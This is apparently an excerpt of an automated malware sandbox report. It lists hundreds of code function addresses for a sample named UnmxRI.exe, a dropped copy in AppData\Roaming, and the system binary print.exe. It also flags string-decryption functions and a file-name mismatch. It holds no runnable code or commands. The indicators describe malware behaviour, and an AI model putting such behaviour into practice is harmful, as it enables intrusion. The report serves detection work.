Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019641A2	9_2_019641A2
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019701AA	9_2_019701AA
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019681CC	9_2_019681CC
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018A0100	9_2_018A0100
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0194A118	9_2_0194A118
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01938158	9_2_01938158
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01942000	9_2_01942000
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019703E6	9_2_019703E6
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018BE3F0	9_2_018BE3F0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196A352	9_2_0196A352
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019302C0	9_2_019302C0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01950274	9_2_01950274
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01970591	9_2_01970591
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B0535	9_2_018B0535
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0195E4F6	9_2_0195E4F6
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01954420	9_2_01954420
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01962446	9_2_01962446
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018AC7C0	9_2_018AC7C0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018D4750	9_2_018D4750
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B0770	9_2_018B0770
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018CC6E0	9_2_018CC6E0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B29A0	9_2_018B29A0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0197A9A6	9_2_0197A9A6
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018C6962	9_2_018C6962
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018968B8	9_2_018968B8
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018DE8F0	9_2_018DE8F0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018BA840	9_2_018BA840
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B2840	9_2_018B2840
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01966BD7	9_2_01966BD7
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196AB40	9_2_0196AB40
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018AEA80	9_2_018AEA80
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018C8DBF	9_2_018C8DBF
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018AADE0	9_2_018AADE0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018BAD00	9_2_018BAD00
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0194CD1F	9_2_0194CD1F
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01950CB5	9_2_01950CB5
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018A0CF2	9_2_018A0CF2
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B0C00	9_2_018B0C00
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0192EFA0	9_2_0192EFA0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018A2FC8	9_2_018A2FC8
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018BCFE0	9_2_018BCFE0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01952F30	9_2_01952F30
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018F2F28	9_2_018F2F28
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018D0F30	9_2_018D0F30
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01924F40	9_2_01924F40
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196CE93	9_2_0196CE93
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018C2E90	9_2_018C2E90
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196EEDB	9_2_0196EEDB
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196EE26	9_2_0196EE26
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B0E59	9_2_018B0E59
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018BB1B0	9_2_018BB1B0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018E516C	9_2_018E516C
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0189F172	9_2_0189F172
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0197B16B	9_2_0197B16B
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B70C0	9_2_018B70C0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0195F0CC	9_2_0195F0CC
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196F0E0	9_2_0196F0E0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019670E9	9_2_019670E9
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018F739A	9_2_018F739A
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196132D	9_2_0196132D
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0189D34C	9_2_0189D34C
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B52A0	9_2_018B52A0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018CB2C0	9_2_018CB2C0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019512ED	9_2_019512ED
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0194D5B0	9_2_0194D5B0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019795C3	9_2_019795C3
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01967571	9_2_01967571
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196F43F	9_2_0196F43F
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018A1460	9_2_018A1460
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196F7B0	9_2_0196F7B0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_019616CC	9_2_019616CC
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018F5630	9_2_018F5630
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01945910	9_2_01945910
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B9950	9_2_018B9950
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018CB950	9_2_018CB950
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B38E0	9_2_018B38E0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0191D800	9_2_0191D800
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018CFB80	9_2_018CFB80
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01925BF0	9_2_01925BF0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018EDBF9	9_2_018EDBF9
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196FB76	9_2_0196FB76
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018F5AA0	9_2_018F5AA0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01951AA3	9_2_01951AA3
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0194DAAC	9_2_0194DAAC
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0195DAC6	9_2_0195DAC6
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01967A46	9_2_01967A46
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196FA49	9_2_0196FA49
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01923A6C	9_2_01923A6C
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018CFDC0	9_2_018CFDC0
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B3D40	9_2_018B3D40
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01961D5A	9_2_01961D5A
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01967D73	9_2_01967D73
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196FCF2	9_2_0196FCF2
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01929C32	9_2_01929C32
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B1F92	9_2_018B1F92
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196FFB1	9_2_0196FFB1
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01873FD5	9_2_01873FD5
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_01873FD2	9_2_01873FD2
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_0196FF09	9_2_0196FF09
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: 9_2_018B9EB0	9_2_018B9EB0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_00B9D55C	10_2_00B9D55C
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD7860	10_2_06AD7860
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06ADB7A0	10_2_06ADB7A0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06ADB5E0	10_2_06ADB5E0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD75C8	10_2_06AD75C8
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD0006	10_2_06AD0006
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06AD0040	10_2_06AD0040
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_06ADA840	10_2_06ADA840
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 10_2_08F90440	10_2_08F90440
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01150100	14_2_01150100
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011A6000	14_2_011A6000
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011E02C0	14_2_011E02C0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01160535	14_2_01160535
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01184750	14_2_01184750
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01160770	14_2_01160770
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0115C7C0	14_2_0115C7C0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0117C6E0	14_2_0117C6E0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01176962	14_2_01176962
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011629A0	14_2_011629A0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01162840	14_2_01162840
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0116A840	14_2_0116A840
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01198890	14_2_01198890
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011468B8	14_2_011468B8
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0118E8F0	14_2_0118E8F0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0115EA80	14_2_0115EA80
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0116AD00	14_2_0116AD00
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0116ED7A	14_2_0116ED7A
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01178DBF	14_2_01178DBF
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01168DC0	14_2_01168DC0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0115ADE0	14_2_0115ADE0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01160C00	14_2_01160C00
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01150CF2	14_2_01150CF2
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01180F30	14_2_01180F30
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011A2F28	14_2_011A2F28
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011D4F40	14_2_011D4F40
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011DEFA0	14_2_011DEFA0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01152FC8	14_2_01152FC8
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01160E59	14_2_01160E59
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01172E90	14_2_01172E90
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0114F172	14_2_0114F172
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0119516C	14_2_0119516C
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0116B1B0	14_2_0116B1B0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0114D34C	14_2_0114D34C
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011633F3	14_2_011633F3
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011652A0	14_2_011652A0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0117B2C0	14_2_0117B2C0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0117D2F0	14_2_0117D2F0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01151460	14_2_01151460
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01163497	14_2_01163497
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011A74E0	14_2_011A74E0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0116B730	14_2_0116B730
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01169950	14_2_01169950
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0117B950	14_2_0117B950
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01165990	14_2_01165990
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011CD800	14_2_011CD800
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011638E0	14_2_011638E0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0117FB80	14_2_0117FB80
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0119DBF9	14_2_0119DBF9
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011D5BF0	14_2_011D5BF0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011D3A6C	14_2_011D3A6C
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01163D40	14_2_01163D40
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_0117FDC0	14_2_0117FDC0
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_011D9C32	14_2_011D9C32
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01179C20	14_2_01179C20
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01161F92	14_2_01161F92
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: 14_2_01169EB0	14_2_01169EB0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EC02C0	16_2_02EC02C0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EE0274	16_2_02EE0274
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E4E3F0	16_2_02E4E3F0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02F003E6	16_2_02F003E6
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFA352	16_2_02EFA352
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02ED2000	16_2_02ED2000
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF81CC	16_2_02EF81CC
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF41A2	16_2_02EF41A2
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02F001AA	16_2_02F001AA
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EC8158	16_2_02EC8158
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E30100	16_2_02E30100
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EDA118	16_2_02EDA118
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E5C6E0	16_2_02E5C6E0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E3C7C0	16_2_02E3C7C0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E40770	16_2_02E40770
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E64750	16_2_02E64750
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EEE4F6	16_2_02EEE4F6
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF2446	16_2_02EF2446
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EE4420	16_2_02EE4420
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02F00591	16_2_02F00591
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E40535	16_2_02E40535
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E3EA80	16_2_02E3EA80
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF6BD7	16_2_02EF6BD7
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFAB40	16_2_02EFAB40
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E6E8F0	16_2_02E6E8F0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E268B8	16_2_02E268B8
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E4A840	16_2_02E4A840
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E42840	16_2_02E42840
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E429A0	16_2_02E429A0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02F0A9A6	16_2_02F0A9A6
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E56962	16_2_02E56962
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFEEDB	16_2_02EFEEDB
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E52E90	16_2_02E52E90
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFCE93	16_2_02EFCE93
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E40E59	16_2_02E40E59
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFEE26	16_2_02EFEE26
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E4CFE0	16_2_02E4CFE0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E32FC8	16_2_02E32FC8
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EBEFA0	16_2_02EBEFA0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EB4F40	16_2_02EB4F40
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E82F28	16_2_02E82F28
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E60F30	16_2_02E60F30
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EE2F30	16_2_02EE2F30
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E30CF2	16_2_02E30CF2
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EE0CB5	16_2_02EE0CB5
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E40C00	16_2_02E40C00
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E3ADE0	16_2_02E3ADE0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E58DBF	16_2_02E58DBF
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E4AD00	16_2_02E4AD00
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EDCD1F	16_2_02EDCD1F
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EE12ED	16_2_02EE12ED
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E5B2C0	16_2_02E5B2C0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E452A0	16_2_02E452A0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E8739A	16_2_02E8739A
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E2D34C	16_2_02E2D34C
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF132D	16_2_02EF132D
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF70E9	16_2_02EF70E9
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFF0E0	16_2_02EFF0E0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EEF0CC	16_2_02EEF0CC
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E470C0	16_2_02E470C0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E4B1B0	16_2_02E4B1B0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E7516C	16_2_02E7516C
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E2F172	16_2_02E2F172
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02F0B16B	16_2_02F0B16B
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF16CC	16_2_02EF16CC
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E85630	16_2_02E85630
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFF7B0	16_2_02EFF7B0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E31460	16_2_02E31460
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFF43F	16_2_02EFF43F
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02F095C3	16_2_02F095C3
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EDD5B0	16_2_02EDD5B0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF7571	16_2_02EF7571
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EEDAC6	16_2_02EEDAC6
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EDDAAC	16_2_02EDDAAC
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E85AA0	16_2_02E85AA0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EE1AA3	16_2_02EE1AA3
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EB3A6C	16_2_02EB3A6C
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFFA49	16_2_02EFFA49
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF7A46	16_2_02EF7A46
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EB5BF0	16_2_02EB5BF0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E7DBF9	16_2_02E7DBF9
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E5FB80	16_2_02E5FB80
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFFB76	16_2_02EFFB76
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E438E0	16_2_02E438E0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EAD800	16_2_02EAD800
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E49950	16_2_02E49950
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E5B950	16_2_02E5B950
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02ED5910	16_2_02ED5910
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E49EB0	16_2_02E49EB0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E03FD2	16_2_02E03FD2
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E03FD5	16_2_02E03FD5
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFFFB1	16_2_02EFFFB1
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E41F92	16_2_02E41F92
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFFF09	16_2_02EFFF09
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EFFCF2	16_2_02EFFCF2
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EB9C32	16_2_02EB9C32
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E5FDC0	16_2_02E5FDC0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF7D73	16_2_02EF7D73
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02E43D40	16_2_02E43D40
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_02EF1D5A	16_2_02EF1D5A
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004B1870	16_2_004B1870
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004ACAC0	16_2_004ACAC0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004ACCE0	16_2_004ACCE0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004AAD60	16_2_004AAD60
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004B2FAD	16_2_004B2FAD
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004B2FB0	16_2_004B2FB0
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_004C7320	16_2_004C7320
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_00BB9068	16_2_00BB9068
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_00BB9B44	16_2_00BB9B44
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_00BB9C64	16_2_00BB9C64
Source: C:\Windows\SysWOW64\print.exe	Code function: 16_2_00BB9FFE	16_2_00BB9FFE

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: String function: 011CEA12 appears 36 times
Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe	Code function: String function: 011A7E54 appears 97 times
Source: C:\Windows\SysWOW64\print.exe	Code function: String function: 02E75130 appears 58 times
Source: C:\Windows\SysWOW64\print.exe	Code function: String function: 02E2B970 appears 280 times
Source: C:\Windows\SysWOW64\print.exe	Code function: String function: 02EAEA12 appears 86 times
Source: C:\Windows\SysWOW64\print.exe	Code function: String function: 02E87E54 appears 111 times
Source: C:\Windows\SysWOW64\print.exe	Code function: String function: 02EBF290 appears 105 times
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: String function: 0189B970 appears 280 times
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: String function: 0191EA12 appears 86 times
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: String function: 018E5130 appears 58 times
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: String function: 018F7E54 appears 111 times
Source: C:\Users\user\Desktop\UnmxRI.exe	Code function: String function: 0192F290 appears 105 times

Sample file is different than original file name gathered from version info

